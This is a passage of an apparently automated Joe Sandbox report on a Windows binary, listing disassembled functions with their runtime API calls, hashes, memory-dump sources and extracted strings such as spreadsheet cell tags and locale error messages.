                                                                                                                                                                  • Opcode ID: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
                                                                                                                                                                  • Instruction ID: ad2ffe81e2f9d95336686e06931725e71fbc79929b7499f8ce494d730019cf44
                                                                                                                                                                  • Opcode Fuzzy Hash: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
                                                                                                                                                                  • Instruction Fuzzy Hash: A971D5B2900205AFDF259EA48CC2FFE77A99FA9714F29005EE805A7281DF35DC4187A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001A1970
                                                                                                                                                                  • CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1988
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 001A1992
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 001A19CB
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 001A19FD
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 001A1A36
                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?), ref: 001A1A90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocInitStringVariant$CreateInitializeInstanceUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1094765775-0
                                                                                                                                                                  • Opcode ID: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
                                                                                                                                                                  • Instruction ID: be2216e1e28a6b830731a4fe1d631fd6daf75731b25f79ca04a5eaf67196f2e3
                                                                                                                                                                  • Opcode Fuzzy Hash: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
                                                                                                                                                                  • Instruction Fuzzy Hash: C341A171A10218EFCF04DFA4D889EAEB7B9FF49304F400558F502AB291CB71A945CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FBD
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_$H_prolog
                                                                                                                                                                  • String ID: </v>$<c r="A1">$<v>$Modified Value
                                                                                                                                                                  • API String ID: 997254673-4044373161
                                                                                                                                                                  • Opcode ID: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
                                                                                                                                                                  • Instruction ID: fec37011940da06f0428c5bbc8cafd88763dad5c141426fb38f21cf82540378a
                                                                                                                                                                  • Opcode Fuzzy Hash: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
                                                                                                                                                                  • Instruction Fuzzy Hash: CD41C9765083416EC324E734DC86FAFB7E8AF96350F00492CF58A97191EB309D09C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,001D81BC,19930522,00000000,1FFFFFFF), ref: 001B2715
                                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 001B2748
                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 001B2771
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallCheckEncodePointerRangeTranslatorTrys
                                                                                                                                                                  • String ID: MOC$RCC$$
                                                                                                                                                                  • API String ID: 877623402-3012946005
                                                                                                                                                                  • Opcode ID: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
                                                                                                                                                                  • Instruction ID: 09494e80c6b68a5067d3dda98230aabd110c5fc975896249ecbd69ad5805b711
                                                                                                                                                                  • Opcode Fuzzy Hash: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C41B932500249AFDF11CF44C885EEEB7AAEF68314F288588FE0467251CB34ED95CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,297D850E,?,001BCCAB,?,?,00000000), ref: 001BCC5D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                  • Opcode ID: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
                                                                                                                                                                  • Instruction ID: db2ad771684fdcb292aaa67875e12770682da75cbc3d3b4da5605eed9bf873be
                                                                                                                                                                  • Opcode Fuzzy Hash: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
                                                                                                                                                                  • Instruction Fuzzy Hash: 00210A32A01214ABC7229B24DD81E9A7F68EF757A4F250125F95EA72D0D730ED01C6E1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
                                                                                                                                                                  • Instruction ID: f78acefc83a9afe0d9b1eb50952129b24de8b835c2eb3f4849f9e1c3e26ea2d3
                                                                                                                                                                  • Opcode Fuzzy Hash: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
                                                                                                                                                                  • Instruction Fuzzy Hash: FAB11474A04249EFDB15DFA8C881FAEBBB6BF69304F14415CF501A7292C774E981CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,001B4BF0,001B179B), ref: 001B4C07
                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B4C15
                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B4C2E
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,001B4BF0,001B179B), ref: 001B4C80
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                  • Opcode ID: 36eeb5be34ff18fb792468254b23e455bf5e41409b9fc483c26eb7605454bd60
                                                                                                                                                                  • Instruction ID: ba16a55b82a9a2abf0a1508212e04ff7c75344c52f7489c720e5b6d35322bcb3
                                                                                                                                                                  • Opcode Fuzzy Hash: 36eeb5be34ff18fb792468254b23e455bf5e41409b9fc483c26eb7605454bd60
                                                                                                                                                                  • Instruction Fuzzy Hash: A801DF3220B7155FA725ABB4BCD9AE73F54EF21BB8760833AF524415E2EF214C819181
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001AE1A6
                                                                                                                                                                  • int.LIBCPMT ref: 001AE1B9
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0
                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 001AE1C2
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 001AE1F9
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 001AE202
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001AE22A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                  • Opcode ID: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
                                                                                                                                                                  • Instruction ID: 4a8f0e804a7bacdcfb993114f686648b2a1c69d1ba6121702cb4060c7a90c237
                                                                                                                                                                  • Opcode Fuzzy Hash: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
                                                                                                                                                                  • Instruction Fuzzy Hash: CD11C43A90012CABCF04EFD4D9459EE7BF9AF65724F11015AE905A7291DF709E05CBD0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001ADEBB
                                                                                                                                                                  • int.LIBCPMT ref: 001ADECE
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0
                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 001ADED7
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 001ADF0E
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 001ADF17
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001ADF3F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                  • Opcode ID: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
                                                                                                                                                                  • Instruction ID: 3bef55255a0badb284da0e689091e42786a6a05b5f2b8ad861d6c4ab2ee67679
                                                                                                                                                                  • Opcode Fuzzy Hash: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
                                                                                                                                                                  • Instruction Fuzzy Hash: 5311043A900518ABCF04EFE8D8059AEB7B8AF66724F11415AF906A7291DF709E05CBD0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001A18D1
                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 001A18E0
                                                                                                                                                                    • Part of subcall function 001A16A2: __Init_thread_footer.LIBCMT ref: 001A1703
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Exception@8Init_thread_footerThrowstd::system_error::system_error
                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 1054456820-1866435925
                                                                                                                                                                  • Opcode ID: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
                                                                                                                                                                  • Instruction ID: df6193bed593758df005c03afe2e874a06b6c1738a9731931e3d57f68dc5dbb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0283D9403087EDB14BA95CC03FBA77AC9F12784F148019F845A6282C7B99805C3A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001A1260
                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A1296
                                                                                                                                                                    • Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF11F
                                                                                                                                                                    • Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF143
                                                                                                                                                                  • std::exception::exception.LIBCONCRT ref: 001A12AF
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001A12C4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::exception
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 159601860-1405518554
                                                                                                                                                                  • Opcode ID: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
                                                                                                                                                                  • Instruction ID: 91b8b9fae90eedc6fb91db4b137552529f25807321ee44045def24db17a9d415
                                                                                                                                                                  • Opcode Fuzzy Hash: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
                                                                                                                                                                  • Instruction Fuzzy Hash: 89014475905744AEC720DFAAD481486FBE8BE293107908A6FE48AD3A11D770E504CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,297D850E,?,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81A3
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B81B5
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
                                                                                                                                                                  • Instruction ID: e532f5418c696d94a282f301ee237c8bca330c09eb0827b9409a5d98d0de35ba
                                                                                                                                                                  • Opcode Fuzzy Hash: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 23014B32904669AFDB129F54DC09FAEBBF8FB04B58F000629F811A26A0DB75D950CA91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001BEC39
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001BED02
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED69
                                                                                                                                                                    • Part of subcall function 001B7330: RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED7C
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1423051803-0
                                                                                                                                                                  • Opcode ID: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
                                                                                                                                                                  • Instruction ID: f9d85bfb9e06646ccfdcd3b39a780c9f3da7ec042ab7628b65f47fb4ecf41c2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51E172600246AFEB249FE0CC81EFB3AEAEF95720F15052CFC08D6150EBB0DC5196A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1E44
                                                                                                                                                                    • Part of subcall function 001ACBFB: _memcmp.LIBVCRUNTIME ref: 001ACC63
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: H_prologIos_base_dtor_memcmpstd::ios_base::_
                                                                                                                                                                  • String ID: </v>$<c r=$<v>
                                                                                                                                                                  • API String ID: 2171099386-3488173955
                                                                                                                                                                  • Opcode ID: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
                                                                                                                                                                  • Instruction ID: 60ee7695180e59a9f5a63f25d3c4f94eb36793fd85ad22e897a6369376d493dd
                                                                                                                                                                  • Opcode Fuzzy Hash: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7751D3761083406ED314EB24DC86EAFBBE8EFD6354F004A2DF59697291DB709909C7A2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

